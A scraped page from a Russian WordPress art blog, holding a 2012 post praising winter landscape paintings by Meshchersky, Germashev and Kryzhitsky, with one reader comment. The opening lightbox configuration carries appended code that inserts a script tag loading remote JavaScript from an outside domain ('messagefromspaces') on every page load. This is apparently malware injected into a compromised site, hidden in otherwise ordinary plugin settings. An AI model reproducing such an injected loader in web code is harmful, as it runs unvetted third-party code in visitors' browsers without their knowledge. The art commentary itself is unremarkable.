, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Зимние картины. Расцвет снежной поры

Автор: Natalia Nikitina | 07 Дек 2012

Зимние картиныКогда отголоски осени уже не слышны, а упавший с дерева последний золото-багряный листочек

посеребрился инеем, в права вступает зима, и как бы её ни звали: морозной королевой, сказочной чаровницей, она прекрасна и неповторима своей свежестью.

Расцвет снежной поры вдохновлял не одного художника на создание творений, запечатляющих красу природы в тот миг, когда она приоткрывает двери, посвящая людей в свои тайны.

Зима в закатный час, уже отошедшая ко сну, но словно не прекращавшая бодрствовать, паутиной окутавшая землю сизо-белым снегом. Она в расцвете своей красы, ещё больше оживлённая оленёнком, крадущимся по хрустящему насту – в картине А. И. Мещерского «Лунная ночь. Тишина».

Волшебная, отражающаяся в озере, как в глазах смотрящего, кажущаяся хрупкой и будто эфемерной с едва уловимым колючим ветерком, щипающим за щёки и нос, но трогательная своими нежными тонами, ранимо-лиричная – в картине М. М. Гермашева «Зима в лесу».

Зима с мягким снегом, устланным ковром с протоптанной дорожкой, кружащими птицами над не одинокими стогами, дымком из трубы домика, кажущимся таким родным. От картины К. Я. Крыжицкого  «Зимний пейзаж со стогами»  веет добром... родной стороной и отчего-то теплотою.

Откровение природы, так отчаянно скрываемое иногда, подарено нам наблюдательными и талантливыми мастерами кисти, с любовью и заботой воспевшими снежную пору, зимние картины которых не холодят душу, а завораживают дивными явлениями самого неповторимого автора...

Темы: Вдохновение | 1 отзыв »

Один отзыв на “Зимние картины. Расцвет снежной поры”

  1. Вероника пишет:
    10 Дек 2012 в 14:22

    Просто и лаконично – спасибо

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress